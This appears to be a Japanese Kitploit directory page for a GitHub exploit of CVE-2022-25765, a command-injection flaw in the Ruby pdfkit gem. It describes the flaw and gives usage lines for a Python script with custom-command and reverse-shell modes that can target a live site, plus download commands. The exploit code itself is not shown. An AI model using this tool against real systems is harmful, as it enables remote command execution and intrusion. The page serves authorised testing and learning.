Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
exploit-CVE-2022-25765 — CVE-2022-25765 (pdfkit) のエクスプロイト - コマンドインジェクション | Kitploit
ツール/GitHubGitHub/unicordev/exploit-cve-2022-25765
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubunicordev/exploit-cve-2022-25765

exploit-CVE-2022-25765

CVE-2022-25765 (pdfkit) のエクスプロイト - コマンドインジェクション

リポジトリを見る
31411ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2022-25765 (pdfkit) のエクスプロイト - コマンドインジェクション

GitHub CVE Cover

このリポジトリが気に入りましたか? ⭐を付けてください!

教育および許可されたセキュリティ研究目的のみに使用してください。

エクスプロイト作成者

@UNICORDev (@NicPWNs と @Dev-Yeoj 作)

脆弱性の説明

pdfkit パッケージ(0.0.0以降)は、URL が適切にサニタイズされていないため、コマンドインジェクションに対して脆弱です。

エクスプロイトの説明

Ruby gem pdfkit は、ウェブサイトや HTML を PDF ドキュメントに変換するためによく使用されます。このソフトウェアの脆弱なバージョン(< 0.8.7.2)では、特別に細工されたコマンドを含む URL が渡されると、そのコマンドが実行されます。このエクスプロイトは、実行可能な URL を生成するか、pdfkit が動作している脆弱なウェブサイトにそれらを送信します。

使用方法

root@kitploit:~
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

オプション

root@kitploit:~
  -c    カスタムコマンドモード。カスタムペイロードを生成するためのコマンドを指定します。
  -s    リバースシェルモード。リバースシェルペイロードを生成するためのローカルIPとポートを指定します。
  -w    脆弱なpdfkitが動作しているウェブサイトのURL。(オプション)
  -p    脆弱なpdfkitが動作しているウェブサイト上のPOSTパラメータ。(オプション)
  -h    このヘルプメニューを表示します。

ダウンロード

GitHubからexploit-CVE-2022-25765.pyをダウンロード

ExploitDBからexploit-CVE-2022-25765.pyをダウンロード

SearchSploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 51293

エクスプロイトの要件

  • python3
  • python3:requests
  • python3:urllib3

デモ

カスタムコマンドモード

cropped command

ターゲットウェブサイトに送信されるリバースシェルモード

exploit-CVE-2022–25765

テスト済み環境

pdfkit バージョン 0.8.6

適用対象

pdfkit バージョン < 0.8.7.2

テスト環境

root@kitploit:~
gem install pdfkit -v 0.8.6

クレジット

  • https://nvd.nist.gov/vuln/detail/CVE-2022-25765
  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
  • https://app.hackthebox.com/machines/Precious
  • https://www.exploit-db.com/exploits/51293
ツールをダウンロード